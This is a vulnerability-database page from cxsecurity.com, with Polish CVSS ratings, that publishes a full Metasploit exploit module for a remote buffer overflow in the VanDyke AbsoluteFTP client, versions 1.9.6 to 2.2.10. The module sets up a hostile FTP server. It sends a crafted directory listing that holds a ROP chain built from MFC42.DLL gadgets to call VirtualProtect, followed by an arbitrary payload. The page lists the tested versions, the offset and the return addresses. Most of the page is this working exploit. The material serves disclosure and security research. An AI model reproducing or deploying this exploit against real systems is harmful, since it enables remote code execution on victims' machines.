AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)

2012.09.17
Credit: Node
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

# Exploit Title: AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST) # Date: 2011-11-09 # Author: Node # Software Link: http://www.vandyke.com/pub/AbsoluteFTP/aftp2210.exe # Version: 1.9.6 - 2.2.10 # Tested on: Windows XP SP3, Windows 7 SP1 # CVE : - # Exploit has been tested to work on: # AbsoluteFTP 2.2.10 (build 252) # AbsoluteFTP 2.2.9 (build 248) # AbsoluteFTP 2.2.8 (build 241) # AbsoluteFTP 2.2.7 (build 238) # AbsoluteFTP 2.2.6 (build 230) # AbsoluteFTP 2.2.5 (build 225) # AbsoluteFTP 2.2.4 (build 216) # AbsoluteFTP 2.2.3 (build 210) # AbsoluteFTP 2.2.2 (build 203) # AbsoluteFTP 2.2 (build 197) # AbsoluteFTP 2.2 (build 291) # AbsoluteFTP 2.2B3 (build 163) # AbsoluteFTP 2.2B2 (build 158) # AbsoluteFTP 2.2B1 (build 144) # AbsoluteFTP 2.0.5 (build 297) # AbsoluteFTP 2.0.4 (build 293) # AbsoluteFTP 2.0.3 (build 289) # AbsoluteFTP 1.9.6 # Does not work on: # AbsoluteFTP 1.8 ## # $Id: $ # Skeleton generated by mona.py - Corelan Team ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer def initialize(info = {}) super(update_info(info, 'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)', 'Description' => %q{ This module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. }, 'License' => MSF_LICENSE, 'Author' => [ 'Node', # Original discovery, MSF module, ROP code ], 'Version' => '$Revision:$', 'References' => [ [ 'OSVDB', '---' ], [ 'CVE', '---' ], [ 'URL', '---' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0d\x5c\x2f\x0a", }, 'Targets' => [ [ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252', { 'Ret' => 0x5f479005, 'Offset' => 3336 } ], ], 'Privileged' => false, 'DisclosureDate' => 'MONTH DAY YEAR', 'DefaultTarget' => 0)) end #copypasted from ScriptFTP exploit def on_client_unknown_command(c,cmd,arg) c.put("200 OK\r\n") end def on_client_command_list(c,arg) conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") return end print_status(" - Data connection set up") code = 150 c.put("#{code} Here comes the directory listing.\r\n") code = 226 c.put("#{code} Directory send ok.\r\n") rop_gadgets = [ 0x5f46a206, # POP EAX # RETN (MFC42.DLL) 0x5f49b260, # <- *&VirtualProtect() 0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL] 0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL] 0x90909090, # NOPS (RETN 4) 0x90909090, # NOPS (-> ebx) 0x5f432001, # POP EBP # RETN (MFC42.DLL) 0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL) 0x5f46a206, # POP EAX # RETN (MFC42.DLL) 0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD 0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL) 0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL) 0x90909090, # NOPS (-> edi) 0x5f498456, # POP ECX # RETN (MFC42.DLL) 0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!! 0x5f46a206, # POP EAX # RETN (MFC42.DLL) 0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx 0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL) 0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL) 0x5f479005, # ROP NOP (-> edi) 0x5f46a206, # POP EAX # RETN (MFC42.DLL) 0x90909090, # NOPS (-> eax) 0x5f4755b8, # PUSHAD # RETN (MFC42.DLL) ].pack("V*") buffer = [0x5f479005].pack("V*")*848 #ROP NOP's buffer << rop_gadgets buffer << "\x90"*30 buffer << payload.encoded #copypasted from ScriptFTP exploit print_status(" - Sending directory list via data connection") dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n" dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n" dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n" conn.put(dirlist) conn.close return end end

Referencje:

http://www.securityfocus.com/bid/50614
http://www.saintcorporation.com/cgi-bin/exploit_info/vandyke_absoluteftp_list_client_overflow
http://www.osvdb.org/77105
http://www.exploit-db.com/exploits/18102
http://secunia.com/advisories/46781


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top